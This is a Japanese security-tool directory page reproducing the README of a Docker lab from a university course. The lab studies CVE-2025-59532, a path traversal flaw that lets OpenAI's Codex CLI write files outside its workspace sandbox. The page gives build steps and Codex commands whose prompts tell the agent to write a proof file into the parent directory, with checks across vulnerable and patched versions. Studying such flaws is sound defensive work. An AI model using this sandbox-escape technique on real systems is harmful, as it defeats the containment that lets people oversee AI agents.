Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-59532-poc — CVE-2025-59532を分析するためのDockerベースの研究環境。OpenAI Codex CLIのパストラバーサル脆弱性で、意図されたワークスペースサンドボックスの外部への任意のファイル書き込みを許可します。CMUコース : 18-739 Hacking & Offensive Security (2025年秋) の一部 | Kitploit
ツール/GitHubGitHub/baktistr/cve-2025-59532-poc
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育ラボと実践
GitHubbaktistr/cve-2025-59532-poc

cve-2025-59532-poc

CVE-2025-59532を分析するためのDockerベースの研究環境。OpenAI Codex CLIのパストラバーサル脆弱性で、意図されたワークスペースサンドボックスの外部への任意のファイル書き込みを許可します。CMUコース : 18-739 Hacking & Offensive Security (2025年秋) の一部

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-59532 Docker環境

CVE-2025-59532を分析するためのDockerベースの研究環境です。これはOpenAI Codex CLIにおけるパストラバーサル脆弱性であり、意図されたワークスペースサンドボックス外への任意のファイル書き込みを可能にします。 CMUのコースの一部:2025年秋学期「18-739 ハッキングとオフェンシブセキュリティ」

はじめに

リポジトリのクローン

まず、このリポジトリをクローンします:

root@kitploit:~
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

またはSSHを使用する場合:

root@kitploit:~
git clone [email protected]:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

CVEの説明

CVE-2025-59532 は、OpenAIのCodex CLIツールにおけるパストラバーサル脆弱性で、攻撃者が意図されたワークスペースディレクトリ外にファイルを書き込むことを可能にし、サンドボックス制限を回避します。

脆弱性の詳細

  • CVE ID: CVE-2025-59532
  • 影響を受けるバージョン: Codex CLI v0.38.0 およびそれ以前
  • 脆弱性の種類: 任意のファイル書き込み / パストラバーサル
  • 深刻度: 高
  • 攻撃ベクトル: 攻撃者は、Codexが親ディレクトリ(例:../exploit.txt)にファイルを書き込むように促すプロンプトを作成し、--sandbox workspace-write が有効な場合でもワークスペースサンドボックスを脱出できます。
  • 影響: システムディレクトリへの不正なファイル作成、権限昇格の可能性、コンテナセキュリティ境界の侵害。
  • パッチ: v0.39.0 でパス検証とサニタイズが改善され修正されました。

仕組み

この脆弱性は、ワークスペースサンドボックス実装における不十分なパス検証を悪用します。workspace-write サンドボックスモードが有効な場合、Codexはファイル操作を指定されたワークスペースディレクトリに制限する必要があります。しかし、v0.38.0では、パス検証が相対パストラバーサルシーケンス(../)を適切に処理できず、攻撃者はAIに親ディレクトリ参照を使用するよう指示することで、サンドボックス外にファイルを書き込むことができます。

前提条件

  • システムにDockerがインストールされていること
  • OpenAI APIキー(https://platform.openai.com/api-keys から取得)
  • Dockerとコマンドライン操作の基本的な理解
  • Git(リポジトリのクローン用)

ビルドと実行

Dockerイメージのビルド:

root@kitploit:~
docker build -t cve-2025-59532:latest .

コンテナの実行:

root@kitploit:~
docker run -it --rm cve-2025-59532:latest

使用方法

このDocker環境には、Codex CLIの3つのバージョンが含まれています:

  • codex38 - v0.38.0(脆弱なバージョン)
  • codex39 - v0.39.0(パッチ適用済みバージョン)
  • codex50 - v0.50.0(最新バージョン)

OpenAI APIキーの設定

コンテナ内に入ったら、codexをインタラクティブモードで実行し、APIキーを貼り付けるだけでOpenAI APIキーを設定できます:

root@kitploit:~
codex

APIキーは ~/.config/codex/auth.json に保存され、すべてのCodexバージョン(codex38、codex39、codex50)で使用されます。

バージョンの確認

root@kitploit:~
codex38 --version  # v0.38.0(脆弱)と表示されるはず
codex39 --version  # v0.39.0(パッチ済み)と表示されるはず
codex50 --version  # v0.50.0(最新)と表示されるはず

脆弱性のテスト

注記: ワークスペースは /workspace/child にあります。この脆弱性により、/workspace(親ディレクトリ)への書き込みが可能になります。

脆弱なバージョンのテスト(v0.38.0):

root@kitploit:~
codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof1.txt' in the parent directory with content 'CVE-2025-59532 POC'"

パッチ適用済みバージョンのテスト(v0.39.0):

root@kitploit:~
codex39 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof2.txt' in the parent directory with content 'CVE-2025-59532 POC'"

最新バージョンのテスト(v0.50.0):

root@kitploit:~
codex50 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof3.txt' in the parent directory with content 'CVE-2025-59532 POC'"

エクスプロイトの確認:

root@kitploit:~
# ファイルがサンドボックス外(/workspace/child ではなく /workspace)に作成されたか確認
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # v0.38.0が脆弱なら存在するはず
cat /workspace/exploit_proof2.txt  # v0.39.0がパッチ済みなら存在しないはず
cat /workspace/exploit_proof3.txt  # v0.50.0が安全なら存在しないはず

# 現在のワークスペースを確認(空、またはテストファイルのみのはず)
pwd  # /workspace/child と表示されるはず
ls -la /workspace/child/

ログの確認

Codex実行の詳細なデバッグログを表示するには:

root@kitploit:~
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof.txt' in the parent directory with content 'CVE-2025-59532 POC'"

デバッグログには以下が表示されます:

  • APIリクエストとレスポンス
  • パス検証の試行
  • ファイル操作の詳細
  • サンドボックスの適用(または回避)の動作
ツールをダウンロード